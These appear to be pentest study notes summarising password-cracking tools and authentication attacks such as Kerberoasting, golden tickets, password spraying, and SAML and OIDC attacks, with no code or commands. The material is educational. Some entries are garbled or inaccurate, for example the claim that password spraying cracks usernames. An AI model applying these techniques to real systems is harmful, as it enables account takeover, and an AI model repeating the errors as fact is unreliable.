Authentication Tools and Attacks

Medusa

Parallel brute-forcer for network logins. Its focus is to support numerous network services that allow remote authentication.

John The Ripper

Highly optimized password cracker. It can identify a large set of hashes with its community edition ("Jumbo") and can run on multiple platforms.

Hashcat

Modern password and hash cracking tool that can speed up the process by using different attack methods (dictionary, mask, hybrid) to add complexity and variability. Supports use of GPU for parallel cracking.

MFA Fatigue

occurs when an attacker has gained access to one authentication method and then attempts to overload the user with requests for a second authentication approval.

Pass-the-Token Attack

also known as a pass-the-PRT attack, allows the pentester to laterally move through the organization's cloud infrastructure while bypassing authentication measures such as MFA. This attack targets the primary refresh token (PRT) which is like a TGT used in an Active Directory environment, except the PRT is used to keep the user authenticated in the cloud environment, such as Azure.

Kerberoasting

1. Get user Service Principal Names (SPN), which will identify all accounts that are candidates for Kerberoasting.

2. From the list of SPNs, get the service tickets of an interesting target, such as a server.

3. Dump out the service ticket, which is encrypted with the NTLM hash of the requested service account.

4. Crack the account's plaintext password offline.

Once the password has been cracked, the pentester can continue taking control of the system. Kerberoasting is a significant attack as many services have admin privileges, and their passwords are seldom changed.

Delegation Atack

If the pentester is able to gain access to an account that has delegation enabled, they may be able to take advantage of this and gain access to other services on the network.

Golden Ticket Attack

The ultimate goal when pentesting a Kerberos network is to gain access to the Kerberos Distribution Center. If the pentester can steal the hash of the Active Directory Key Distribution Service Account (KRBTGT), they will essentially be able to grant themselves valid tickets whenever they want. This is known as the golden ticket.

LDAP Injection

that the pentester is putting the malicious query into an input box. If the LDAP server is not properly configured to sanitize user input, then this attack can grant the pentester access to network resources.

Mask Attack

a password cracking technique that is similar to a brute-force attack, but is more systematic and typically quicker. In a blank attack, the password cracker can try specific combinations of characters and password lengths.

Password Spraying

a type of brute-force attack, but instead of trying to crack the password, the pentester attempts to crack the username. The pentester will use the same password and try that with different usernames. This attack works great in environments where default passwords are set for users and rely on the users to change the passwords.

Credential Stuffing

type of brute force attack where an attacker obtains a user's login credentials from one organization and uses those login credentials on another site or app. The hope with this attack is that the user has an account with the second site and is reusing the same credentials.

OpenID Connect (OIDC) Attack

they can be subject to some vulnerabilities including:

• Client-Side Request Forgery (CSRF)

• Server-Side Request Forgery (SSRF)

• Impersonating a user by stealing a valid token

SAML Attack

If not properly configured, this process can be exploited to gain unauthorized access to resources. Some potential attacks include:

• XML Signature Wrapping - The contents of the XML file are edited to include malicious data while maintaining the original valid signature.

• Assertion Tampering - The assertion statements are intercepted and altered changing the attributes or authorization data.

• On-Path and Replay attacks - If the attacker can intercept a legitimate SAML assertion, they can use a replay attack to gain unauthorized access.